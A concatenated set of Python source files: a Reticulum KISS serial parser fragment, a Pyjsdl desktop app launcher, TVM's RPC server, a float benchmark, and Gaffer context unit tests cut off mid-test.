if (in_frame and byte == KISS.FEND and command == KISS.CMD_DATA):
in_frame = False
self.processIncoming(data_buffer)
data_buffer = b""
command_buffer = b""
elif (byte == KISS.FEND):
in_frame = True
command = KISS.CMD_UNKNOWN
data_buffer = b""
command_buffer = b""
elif (in_frame and len(data_buffer) < RNS.Reticulum.MTU):
if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN):
command = byte
elif (command == KISS.CMD_DATA):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
data_buffer = data_buffer+bytes([byte])
elif (command == KISS.CMD_FREQUENCY):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
command_buffer = command_buffer+bytes([byte])
if (len(command_buffer) == 4):
self.r_frequency = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
RNS.log(str(self)+" Radio reporting frequency is "+str(self.r_frequency/1000000.0)+" MHz", RNS.LOG_DEBUG)
self.updateBitrate()
elif (command == KISS.CMD_BANDWIDTH):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
command_buffer = command_buffer+bytes([byte])
if (len(command_buffer) == 4):
self.r_bandwidth = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
RNS.log(str(self)+" Radio reporting bandwidth is "+str(self.r_bandwidth/1000.0)+" KHz", RNS.LOG_DEBUG)
self.updateBitrate()
elif (command == KISS.CMD_TXPOWER):
self.r_txpower = byte
RNS.log(str(self)+" Radio reporting TX power is "+str(self.r_txpower)+" dBm", RNS.LOG_DEBUG)
elif (command == KISS.CMD_SF):
self.r_sf = byte
RNS.log(str(self)+" Radio reporting spreading factor is "+str(self.r_sf), RNS.LOG_DEBUG)
self.updateBitrate()
elif (command == KISS.CMD_CR):
self.r_cr = byte
RNS.log(str(self)+" Radio reporting coding rate is "+str(self.r_cr), RNS.LOG_DEBUG)
self.updateBitrate()
elif (command == KISS.CMD_RADIO_STATE):
self.r_state = byte
elif (command == KISS.CMD_RADIO_LOCK):
self.r_lock = byte
elif (command == KISS.CMD_STAT_RX):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
command_buffer = command_buffer+bytes([byte])
if (len(command_buffer) == 4):
self.r_stat_rx = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
elif (command == KISS.CMD_STAT_TX):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
command_buffer = command_buffer+bytes([byte])
if (len(command_buffer) == 4):
self.r_stat_tx = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
elif (command == KISS.CMD_STAT_RSSI):
self.r_stat_rssi = byte-RNodeInterface.RSSI_OFFSET
elif (command == KISS.CMD_STAT_SNR):
self.r_stat_snr = int.from_bytes(bytes([byte]), byteorder="big", signed=True) * 0.25
elif (command == KISS.CMD_RANDOM):
self.r_random = byte
elif (command == KISS.CMD_ERROR):
if (byte == KISS.ERROR_INITRADIO):
RNS.log(str(self)+" hardware initialisation error (code "+RNS.hexrep(byte)+")", RNS.LOG_ERROR)
elif (byte == KISS.ERROR_TXFAILED):
RNS.log(str(self)+" hardware TX error (code "+RNS.hexrep(byte)+")", RNS.LOG_ERROR)
else:
RNS.log(str(self)+" hardware error (code "+RNS.hexrep(byte)+")", RNS.LOG_ERROR)
elif (command == KISS.CMD_READY):
self.process_queue()
else:
time_since_last = int(time.time()*1000) - last_read_ms
if len(data_buffer) > 0 and time_since_last > self.timeout:
RNS.log(str(self)+" serial read timeout", RNS.LOG_DEBUG)
data_buffer = b""
in_frame = False
command = KISS.CMD_UNKNOWN
escape = False
if self.id_interval != None and self.id_callsign != None:
if self.first_tx != None:
if time.time() > self.first_tx + self.id_interval:
RNS.log("Interface "+str(self)+" is transmitting beacon data: "+str(self.id_callsign.decode("utf-8")), RNS.LOG_DEBUG)
self.processOutgoing(self.id_callsign)
sleep(0.08)
except Exception as e:
self.online = False
RNS.log("A serial port error occurred, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("The interface "+str(self.name)+" is now offline. Restart Reticulum to attempt reconnection.", RNS.LOG_ERROR)
def __str__(self):
return "RNodeInterface["+self.name+"]"
|
app.py
|
#!/usr/bin/env python
#Pyjsdl - Copyright (C) 2021
#Released under the MIT License
"""
Pyjsdl App
Script launches HTML app on desktop using Gtk/Webkit.
Copy the app script to the application root and optionally rename it.
Run the script once to create an ini file, then edit it to configure.
Tested under Linux Gnome desktop with the installed packages:
gir1.2-webkit2-4.0, python-gi (py2), python3-gi (py3).
On other OS, additional installation steps may be required.
"""
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('WebKit2', '4.0')
from gi.repository import Gtk, WebKit2
import multiprocessing
import os.path
import sys
if sys.version_info.major >= 3:
from socketserver import TCPServer
from http.server import SimpleHTTPRequestHandler
else:
from SocketServer import TCPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class Server(TCPServer):
allow_reuse_address = True
def __init__(self, port):
TCPServer.__init__(self, ("", port), SimpleHTTPRequestHandler)
self.process = multiprocessing.Process(target=self.serve_forever)
def initiate(self):
self.process.daemon = True
self.process.start()
def terminate(self):
self.process.terminate()
class QuietServer(Server):
def __init__(self, port):
TCPServer.__init__(self, ("", port), QuietHandler)
self.process = multiprocessing.Process(target=self.serve_forever)
class QuietHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
class App(object):
def __init__(self, config):
self.config = config
self.window = Gtk.Window()
self.window.resize(self.config.width+16,self.config.height+16)
if self.config.app_name is not None:
self.window.set_title(self.config.app_name)
else:
title = self.config.app_uri.split('/')[-1].split('.')[0]
self.window.set_title(title.capitalize())
self.window.connect('destroy', Gtk.main_quit)
self.web = None
self.server = None
def webview_setup(self):
self.web = WebKit2.WebView()
uri = 'http://{}:{}/{}'.format(self.config.server_ip,
self.config.server_port,
self.config.app_uri)
self.web.load_uri(uri)
self.window.add(self.web)
def webview(self):
self.webview_setup()
self.window.show_all()
Gtk.main()
def server_enable(self):
if not self.server:
if self.config.server_log:
self.server = Server(self.config.server_port)
else:
self.server = QuietServer(self.config.server_port)
self.server.initiate()
def server_disable(self):
if self.server:
self.server.terminate()
class Config(object):
def __init__(self):
self.server_ip = 'localhost'
self.server_port = 8000
self.server_log = False
self.app_uri = None
self.app_name = None
self.width = 500
self.height = 500
self.config_name = sys.argv[0].split('.')[0]+'.ini'
if os.path.exists(self.config_name):
cfg_setting = self.read_ini()
else:
self.create_ini()
print('Enter configuration info in {}.'.format(self.config_name))
sys.exit()
for setting in cfg_setting:
if setting == 'app_uri':
self.app_uri = cfg_setting['app_uri'].strip()
if setting == 'app_name':
self.app_name = cfg_setting['app_name'].strip()
if setting == 'window_width':
self.width = int(cfg_setting['window_width'].strip())
if setting == 'window_height':
self.height = int(cfg_setting['window_height'].strip())
if setting == 'server_ip':
self.server_ip = cfg_setting['server_ip'].strip()
if setting == 'server_port':
self.server_port = int(cfg_setting['server_port'].strip())
if setting == 'server_log':
server_log = cfg_setting['server_log'].strip().lower()
self.server_log = {'true':True, 'false':False}[server_log]
def create_ini(self):
f = open(self.config_name, 'w')
f.write('#App Configuration\n\n')
f.write('app_uri app.html\n\n')
f.write('app_name App\n\n')
f.write('window_width 500\n\n')
f.write('window_height 500\n\n')
f.write('server_ip localhost\n\n')
f.write('server_port 8000\n\n')
f.write('server_log false\n\n')
f.close()
def read_ini(self):
cfg_file = open(self.config_name)
cfg = [ln.strip().split(' ',1) for ln in cfg_file if ln[:1].isalpha()]
cfg = dict(cfg)
cfg_file.close()
return cfg
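# For the default ini written by create_ini above, read_ini returns a plain dict of strings
# (shown here for illustration): {'app_uri': 'app.html', 'app_name': 'App',
# 'window_width': '500', 'window_height': '500', 'server_ip': 'localhost',
# 'server_port': '8000', 'server_log': 'false'}; __init__ then strips and converts the values
# it knows about.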
def main():
config = Config()
app = App(config)
app.server_enable()
app.webview()
app.server_disable()
if __name__ == '__main__':
main()
|
server.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""RPC server implementation.
Note
----
Server is TCP based with the following protocol:
- Initial handshake to the peer
- [RPC_MAGIC, keysize(int32), key-bytes]
- The key is in format
- {server|client}:device-type[:random-key] [-timeout=timeout]
"""
# pylint: disable=invalid-name
from __future__ import absolute_import
import os
import ctypes
import socket
import select
import struct
import logging
import multiprocessing
import subprocess
import time
import sys
import signal
from .._ffi.function import register_func
from .._ffi.base import py_str
from .._ffi.libinfo import find_lib_path
from ..module import load as _load_module
from ..contrib import util
from . import base
from . base import TrackerCode
logger = logging.getLogger('RPCServer')
def _server_env(load_library, work_path=None):
"""Server environment function return temp dir"""
if work_path:
temp = work_path
else:
temp = util.tempdir()
# pylint: disable=unused-variable
@register_func("tvm.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
m = _load_module(path)
logger.info("load_module %s", path)
return m
libs = []
load_library = load_library.split(":") if load_library else []
for file_name in load_library:
file_name = find_lib_path(file_name)[0]
libs.append(ctypes.CDLL(file_name, ctypes.RTLD_GLOBAL))
logger.info("Load additional library %s", file_name)
temp.libs = libs
return temp
def _serve_loop(sock, addr, load_library, work_path=None):
"""Server loop"""
sockfd = sock.fileno()
temp = _server_env(load_library, work_path)
base._ServerLoop(sockfd)
if not work_path:
temp.remove()
logger.info("Finish serving %s", addr)
def _parse_server_opt(opts):
# parse client options
ret = {}
for kv in opts:
if kv.startswith("-timeout="):
ret["timeout"] = float(kv[9:])
return ret
def _listen_loop(sock, port, rpc_key, tracker_addr, load_library, custom_addr):
"""Listening loop of the server master."""
def _accept_conn(listen_sock, tracker_conn, ping_period=2):
"""Accept connection from the other places.
Parameters
----------
listen_sock: Socket
The socket used by listening process.
tracker_conn : connection to the tracker
Tracker connection
ping_period : float, optional
ping the tracker every `ping_period` seconds if no connection is accepted.
"""
old_keyset = set()
# Report resource to tracker
if tracker_conn:
matchkey = base.random_key(rpc_key + ":")
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey), custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
else:
matchkey = rpc_key
unmatch_period_count = 0
unmatch_timeout = 4
# Wait until we get a valid connection
while True:
if tracker_conn:
trigger = select.select([listen_sock], [], [], ping_period)
if not listen_sock in trigger[0]:
base.sendjson(tracker_conn, [TrackerCode.GET_PENDING_MATCHKEYS])
pending_keys = base.recvjson(tracker_conn)
old_keyset.add(matchkey)
# if match key not in pending key set
# it means the key is acquired by a client but not used.
if matchkey not in pending_keys:
unmatch_period_count += 1
else:
unmatch_period_count = 0
# regenerate match key if key is acquired but not used for a while
if unmatch_period_count * ping_period > unmatch_timeout + ping_period:
logger.info("no incoming connections, regenerate key ...")
matchkey = base.random_key(rpc_key + ":", old_keyset)
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey),
custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
unmatch_period_count = 0
continue
conn, addr = listen_sock.accept()
magic = struct.unpack("<i", base.recvall(conn, 4))[0]
if magic != base.RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
key = py_str(base.recvall(conn, keylen))
arr = key.split()
expect_header = "client:" + matchkey
server_key = "server:" + rpc_key
if arr[0] != expect_header:
conn.sendall(struct.pack("<i", base.RPC_CODE_MISMATCH))
conn.close()
logger.warning("mismatch key from %s", addr)
continue
else:
conn.sendall(struct.pack("<i", base.RPC_CODE_SUCCESS))
conn.sendall(struct.pack("<i", len(server_key)))
conn.sendall(server_key.encode("utf-8"))
return conn, addr, _parse_server_opt(arr[1:])
# Server logic
tracker_conn = None
while True:
try:
# step 1: setup tracker and report to tracker
if tracker_addr and tracker_conn is None:
tracker_conn = base.connect_with_retry(tracker_addr)
tracker_conn.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(tracker_conn, 4))[0]
if magic != base.RPC_TRACKER_MAGIC:
raise RuntimeError("%s is not RPC Tracker" % str(tracker_addr))
# report status of current queue
cinfo = {"key" : "server:" + rpc_key}
base.sendjson(tracker_conn,
[TrackerCode.UPDATE_INFO, cinfo])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
# step 2: wait for in-coming connections
conn, addr, opts = _accept_conn(sock, tracker_conn)
except (socket.error, IOError):
# retry when tracker is dropped
if tracker_conn:
tracker_conn.close()
tracker_conn = None
continue
except RuntimeError as exc:
raise exc
# step 3: serving
work_path = util.tempdir()
logger.info("connection from %s", addr)
server_proc = multiprocessing.Process(target=_serve_loop,
args=(conn, addr, load_library, work_path))
server_proc.daemon = True
server_proc.start()
# close from our side.
conn.close()
# wait until server process finish or timeout
server_proc.join(opts.get("timeout", None))
if server_proc.is_alive():
logger.info("Timeout in RPC session, kill..")
server_proc.terminate()
work_path.remove()
def _connect_proxy_loop(addr, key, load_library):
key = "server:" + key
retry_count = 0
max_retry = 5
retry_period = 5
while True:
try:
sock = socket.socket(base.get_addr_family(addr), socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("<i", base.RPC_MAGIC))
sock.sendall(struct.pack("<i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
if magic == base.RPC_CODE_DUPLICATE:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == base.RPC_CODE_MISMATCH:
logger.warning("RPCProxy do not have matching client key %s", key)
elif magic != base.RPC_CODE_SUCCESS:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
keylen = struct.unpack("<i", base.recvall(sock, 4))[0]
remote_key = py_str(base.recvall(sock, keylen))
opts = _parse_server_opt(remote_key.split()[1:])
logger.info("connected to %s", str(addr))
process = multiprocessing.Process(
target=_serve_loop, args=(sock, addr, load_library))
process.daemon = True
process.start()
sock.close()
process.join(opts.get("timeout", None))
if process.is_alive():
logger.info("Timeout in RPC session, kill..")
process.terminate()
retry_count = 0
except (socket.error, IOError) as err:
retry_count += 1
logger.warning("Error encountered %s, retry in %g sec", str(err), retry_period)
if retry_count > max_retry:
raise RuntimeError("Maximum retry error: last error: %s" % str(err))
time.sleep(retry_period)
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += py_str(out)
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a separate process.
This is a simple python implementation based on multi-processing.
It is also possible to implement a similar C based server with
TVM runtime which does not depend on the python.
Parameters
----------
host : str
The host url of the server.
port : int
The port to bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
Whether to use Popen to start a fresh new process instead of fork.
Switching this on is recommended if we want to run a local RPC demonstration
for GPU devices, to avoid fork safety issues.
tracker_addr: Tuple (str, int) , optional
The address of the RPC Tracker in tuple(host, port) format.
If not None, the server will register itself with the tracker.
key : str, optional
The key used to identify the device type in tracker.
load_library : str, optional
List of additional libraries to be loaded during execution.
custom_addr: str, optional
Custom IP address to report to the RPC Tracker
silent: bool, optional
Whether to run this server in silent mode.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
tracker_addr=None,
key="",
load_library=None,
custom_addr=None,
silent=False):
try:
if base._ServerLoop is None:
raise RuntimeError("Please compile with USE_RPC=1")
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
self.host = host
self.port = port
self.libs = []
self.custom_addr = custom_addr
self.use_popen = use_popen
if silent:
logger.setLevel(logging.ERROR)
if use_popen:
cmd = [sys.executable,
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
if tracker_addr:
assert key
cmd += ["--tracker=%s:%d" % tracker_addr,
"--key=%s" % key]
if load_library:
cmd += ["--load-library", load_library]
if custom_addr:
cmd += ["--custom-addr", custom_addr]
if silent:
cmd += ["--silent"]
# preexec_fn is not thread safe and may result in deadlock.
# python 3.2 introduced the start_new_session parameter as
# an alternative to the common use case of
# preexec_fn=os.setsid. Once the minimum version of python
# supported by TVM reaches python 3.2 this code can be
# rewritten in favour of start_new_session. In the
# interim, stop the pylint diagnostic.
#
# pylint: disable=subprocess-popen-preexec-fn
self.proc = subprocess.Popen(cmd, preexec_fn=os.setsid)
time.sleep(0.5)
elif not is_proxy:
sock = socket.socket(base.get_addr_family((host, port)), socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(
self.sock, self.port, key, tracker_addr, load_library,
self.custom_addr))
self.proc.daemon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key, load_library))
self.proc.daemon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.use_popen:
if self.proc:
os.killpg(self.proc.pid, signal.SIGTERM)
self.proc = None
else:
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
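
# Hedged usage sketch (not part of the original module): the initial handshake described in the
# module docstring, performed by hand against a locally started server. The host, port range and
# key below are assumptions for illustration only, and base._ServerLoop must be available
# (TVM compiled with USE_RPC=1).
if __name__ == "__main__":
    example_server = Server("127.0.0.1", port=9091, port_end=9199, key="example")
    conn = socket.create_connection(("127.0.0.1", example_server.port))
    conn.sendall(struct.pack("<i", base.RPC_MAGIC))            # RPC_MAGIC
    key = "client:example"                                     # must match the server key
    conn.sendall(struct.pack("<i", len(key)))                  # keysize(int32)
    conn.sendall(key.encode("utf-8"))                          # key-bytes
    code = struct.unpack("<i", base.recvall(conn, 4))[0]       # RPC_CODE_SUCCESS on match
    keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
    remote_key = py_str(base.recvall(conn, keylen))            # e.g. "server:example"
    logger.info("handshake reply code %d, remote key %s", code, remote_key)
    conn.close()
    example_server.terminate()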
|
bm_float.py
|
"""
Artificial, floating point-heavy benchmark originally used by Factor.
"""
from six.moves import xrange
import multiprocessing as mp
from mpkmemalloc import *
import os
import gc
import threading
import psutil
import pyperf
from math import sin, cos, sqrt
POINTS = 100000
class Point(object):
__slots__ = ('x', 'y', 'z')
def __init__(self, i):
self.x = x = sin(i)
self.y = cos(i) * 3
self.z = (x * x) / 2
def __repr__(self):
return "<Point: x=%s, y=%s, z=%s>" % (self.x, self.y, self.z)
def normalize(self):
x = self.x
y = self.y
z = self.z
norm = sqrt(x * x + y * y + z * z)
self.x /= norm
self.y /= norm
self.z /= norm
def maximize(self, other):
self.x = self.x if self.x > other.x else other.x
self.y = self.y if self.y > other.y else other.y
self.z = self.z if self.z > other.z else other.z
return self
def maximize(points):
next = points[0]
for p in points[1:]:
next = next.maximize(p)
return next
def benchmark(n):
points = [None] * n
for i in xrange(n):
points[i] = Point(i)
for p in points:
p.normalize()
return maximize(points)
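# Worked example (illustrative): benchmark(3) creates Point(0), Point(1) and
# Point(2), normalizes each to unit length, and returns a single Point holding
# the component-wise maxima of the three normalized points.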
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
runner = pyperf.Runner(loops=1)
runner.metadata['description'] = "Float benchmark"
points = POINTS
runner.bench_func('float', benchmark, points)
del runner
pymem_reset()
process = psutil.Process(os.getpid())
print((process.memory_full_info().pss)/1024.0) # PSS in KiB
def dummyFunc(name):
pass
def main(params):
# pymem_setup_allocators(0)
gc.disable()
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(mp.Process(target=functionWorker, args=[tname,0], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
pymem_reset_pkru()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
process = psutil.Process(os.getpid())
print((process.memory_full_info().pss)/1024.0) # PSS in KiB
return(result)
if __name__ == '__main__':
out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
|
ContextTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import imath
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.assertTrue( context.isSame( c ) )
changes.append( ( name, context.get( name, None ) ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
self.assertEqual( changes, [ ( "a", 2 ) ] )
c["a"] = 3
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ) ] )
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# Removing variables should also trigger the changed signal.
del changes[:]
c.remove( "a" )
self.assertEqual( changes, [ ( "a", None ) ] )
del c["b"]
self.assertEqual( changes, [ ( "a", None ), ( "b", None ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.assertIsInstance( c["int"], int )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.assertIsInstance( c["float"], float )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.assertIsInstance( c["string"], str )
c["v2i"] = imath.V2i( 1, 2 )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "v2i" ), imath.V2i( 1, 2 ) )
c.set( "v2i", imath.V2i( 1, 2 ) )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertIsInstance( c["v2i"], imath.V2i )
c["v3i"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "v3i" ), imath.V3i( 1, 2, 3 ) )
c.set( "v3i", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertIsInstance( c["v3i"], imath.V3i )
c["v2f"] = imath.V2f( 1, 2 )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "v2f" ), imath.V2f( 1, 2 ) )
c.set( "v2f", imath.V2f( 1, 2 ) )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertIsInstance( c["v2f"], imath.V2f )
c["v3f"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "v3f" ), imath.V3f( 1, 2, 3 ) )
c.set( "v3f", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertIsInstance( c["v3f"], imath.V3f )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.assertFalse( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.assertFalse( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.assertTrue( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.assertTrue( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
def f() :
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.assertFalse( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.assertFalse( c["v"].isSame( v ) )
def testGetFallbackValue( self ) :
c = Gaffer.Context()
self.assertEqual( c.get( "f" ), None )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
c = Gaffer.Context()
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.assertTrue( w() is c )
with c :
pass
del c
self.assertIsNone( w() )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.assertIsInstance( c, Gaffer.Context )
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testSubstituteTildeInMiddle( self ) :
c = Gaffer.Context()
self.assertEqual( c.substitute( "a~b" ), "a~b" )
def testSubstituteWithMask( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
